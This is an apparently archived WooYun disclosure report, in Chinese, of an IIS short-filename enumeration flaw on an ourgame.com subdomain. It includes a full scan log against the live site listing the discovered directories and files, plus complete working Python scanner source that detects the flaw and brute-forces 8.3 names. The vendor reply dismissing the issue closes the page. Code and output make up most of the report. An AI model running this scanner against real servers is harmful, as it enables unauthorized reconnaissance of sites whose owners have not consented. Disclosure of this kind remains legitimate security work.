乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-25: 细节已通知厂商并且等待厂商处理中 2015-11-25: 厂商已经主动忽略漏洞,细节向公众公开
.............
漏洞地址:http://subject.ourgame.com/,这个二级域名会跳转到主站!这个漏洞其实没有什么,全靠猜这个漏洞可以导致DOS,这个不敢测试,怕影响网站的正常运营参考其他的漏洞利用案例: WooYun: 完美时空某分站短文件名泄露 WooYun: 阳光雨露主站IIS短文件名泄露并成功登录主站后台
C:\Users\Administrator\Desktop\IIS_shortname_Scanner-master>python iis_shortname_Scan.py http://subject.ourgame.com/server is vulerable, please wait, scanning...Found /i**** [scan in progress]Found /g**** [scan in progress]Found /e**** [scan in progress]Found /a**** [scan in progress]Found /c**** [scan in progress]Found /j**** [scan in progress]Found /s**** [scan in progress]Found /t**** [scan in progress]Found /w**** [scan in progress]Found /z**** [scan in progress]Found /in**** [scan in progress]Found /ge**** [scan in progress]Found /er**** [scan in progress]Found /as**** [scan in progress]Found /cr**** [scan in progress]Found /ju**** [scan in progress]Found /sr**** [scan in progress]Found /su**** [scan in progress]Found /th**** [scan in progress]Found /we**** [scan in progress]Found /zi**** [scan in progress]Found /ind**** [scan in progress]Found /get**** [scan in progress]Found /err**** [scan in progress]Found /asp**** [scan in progress]Found /cro**** [scan in progress]Found /jun**** [scan in progress]Found /srv**** [scan in progress]Found /sum**** [scan in progress]Found /thi**** [scan in progress]Found /web**** [scan in progress]Found /zib**** [scan in progress]Found /inde**** [scan in progress]Found /geto**** [scan in progress]Found /erro**** [scan in progress]Found /aspn**** [scan in progress]Found /cros**** [scan in progress]Found /junq**** [scan in progress]Found /srvc**** [scan in progress]Found /summ**** [scan in progress]Found /thir**** [scan in progress]Found /weba**** [scan in progress]Found /zibe**** [scan in progress]Found /index**** [scan in progress]Found /geton**** [scan in progress]Found /error**** [scan in progress]Found /aspne**** [scan in progress]Found /cross**** [scan in progress]Found /junqi**** [scan in progress]Found /srvce**** [scan in progress]Found /summe**** [scan in progress]Found /third**** [scan in progress]Found /webac**** [scan in progress]Found /zibei**** [scan in progress]Found /index_**** [scan in progress]Found /getonl**** [scan in progress]Found /aspnet**** [scan in progress]Found /crossd**** [scan in progress]Found /junqim**** [scan in progress]Found /srvcen**** [scan in progress]Found /summer**** [scan in progress]Found /thirdu**** [scan in progress]Found /webact**** [scan in progress]Found /zibei2**** [scan in progress]Found /zibei3**** [scan in progress]Found /index_*c** [scan in progress]Found /index_*s** [scan in progress]Found /getonl [scan in progress]Found Dir /getonl~1 [Done]Found /aspnet [scan in progress]Found Dir /aspnet~1 [Done]Found /crossd*m** [scan in progress]Found /crossd*l** [scan in progress]Found /crossd*x** [scan in progress]Found /junqim [scan in progress]Found Dir /junqim~1 [Done]Found /srvcen [scan in progress]Found Dir /srvcen~1 [Done]Found /summer [scan in progress]Found Dir /summer~1 [Done]Found /thirdu [scan in progress]Found Dir /thirdu~1 [Done]Found /webact [scan in progress]Found Dir /webact~1 [Done]Found /zibei2*h** [scan in progress]Found /zibei2*m** [scan in progress]Found /zibei2*t** [scan in progress]Found /zibei3*h** [scan in progress]Found /zibei3*m** [scan in progress]Found /zibei3*t** [scan in progress]Found /index_*cs* [scan in progress]Found /index_*ss* [scan in progress]Found /crossd*ml* [scan in progress]Found /crossd*xm* [scan in progress]Found /zibei2*ht* [scan in progress]Found /zibei2*tm* [scan in progress]Found /zibei3*ht* [scan in progress]Found /zibei3*tm* [scan in progress]Found /index_*css [scan in progress]Found File /index_~1.css [Done]Found /crossd*xml [scan in progress]Found File /crossd~1.xml [Done]Found /zibei2*htm [scan in progress]Found File /zibei2~1.htm [Done]Found /zibei3*htm [scan in progress]Found File /zibei3~1.htm [Done]----------------------------------------------------------------Dir: /getonl~1Dir: /aspnet~1Dir: /junqim~1Dir: /srvcen~1Dir: /summer~1Dir: /thirdu~1Dir: /webact~1File: /index_~1.cssFile: /crossd~1.xmlFile: /zibei2~1.htmFile: /zibei3~1.htm----------------------------------------------------------------7 Directories, 4 Files found in toal
不存在文件:
存在文件:
检测payload 想要获取全名可以加字典规则:
import sysimport httplibimport urlparseimport stringimport threadingimport Queueimport timeimport stringclass Scanner(): def __init__(self, target): self.target = target self.scheme, self.netloc, self.path, params, query, fragment = \ urlparse.urlparse(target) if self.path[-1:] != '/': # ends with slash self.path += '/' self.payloads = list('abcdefghijklmnopqrstuvwxyz0123456789_-') self.files = [] self.dirs = [] self.queue = Queue.Queue() self.lock = threading.Lock() self.threads = [] def _conn(self): try: if self.scheme == 'https': conn = httplib.HTTPSConnection(self.netloc) else: conn = httplib.HTTPConnection(self.netloc) return conn except Exception, e: print '[Exception in function _conn]', e return None # fetch http response status code def _get_status(self, path): try: conn = self._conn() conn.request('GET', path) status = conn.getresponse().status conn.close() return status except Exception, e: raise Exception('[Exception in function _get_status] %s' % str(e) ) # test weather the server is vulerable def is_vul(self): try: status_1 = self._get_status(self.path + '/*~1****/a.aspx') # an existed file/folder status_2 = self._get_status(self.path + '/l1j1e*~1****/a.aspx') # not existed file/folder if status_1 == 404 and status_2 == 400: return True return False except Exception, e: raise Exception('[Exception in function is_val] %s' % str(e) ) def run(self): # start from root path for payload in self.payloads: self.queue.put( (self.path + payload, '****') ) # filename, extention for i in range(10): t = threading.Thread(target=self._scan_worker) self.threads.append(t) t.start() def report(self): for t in self.threads: t.join() self._print('-'* 64) for d in self.dirs: self._print('Dir: ' + d) for f in self.files: self._print('File: ' + f) self._print('-'*64) self._print('%d Directories, %d Files found in toal' % (len(self.dirs), len(self.files)) ) def _print(self, msg): self.lock.acquire() print msg self.lock.release() def _scan_worker(self): while True: try: url, ext = self.queue.get(timeout=3) status = self._get_status(url + '*~1' + ext + '/1.aspx') if status == 404: self._print('Found ' + url + ext + '\t[scan in progress]') if len(url) - len(self.path)< 6: # enum first 6 chars only for payload in self.payloads: self.queue.put( (url + payload, ext) ) else: if ext == '****': # begin to scan extention for payload in string.ascii_lowercase: self.queue.put( (url, '*' + payload + '**') ) self.queue.put( (url,'') ) # also it can be a folder elif ext.count('*') == 3: for payload in string.ascii_lowercase: self.queue.put( (url, '*' + ext[1] + payload + '*') ) elif ext.count('*') == 2: for payload in string.ascii_lowercase: self.queue.put( (url, '*' + ext[1] + ext[2] + payload ) ) elif ext == '': self.dirs.append(url + '~1') self._print('Found Dir ' + url + '~1\t[Done]') elif ext.count('*') == 1: self.files.append(url + '~1.' + ext[1:]) self._print('Found File ' + url + '~1.' + ext[1:] + '\t[Done]') except Exception,e: break if len(sys.argv) == 1: print 'Usage: %s target' % sys.argv[0] sys.exit()target = sys.argv[1]s = Scanner(target)if not s.is_vul(): print 'Sorry, server is not vulerable' sys.exit(0)print 'server is vulerable, please wait, scanning...'s.run()s.report()
升级
危害等级:无影响厂商忽略
忽略时间:2015-11-25 10:46
公司系统正在逐一升级,并且也没有其他的信息泄露。感谢您对联众游戏的关注。
暂无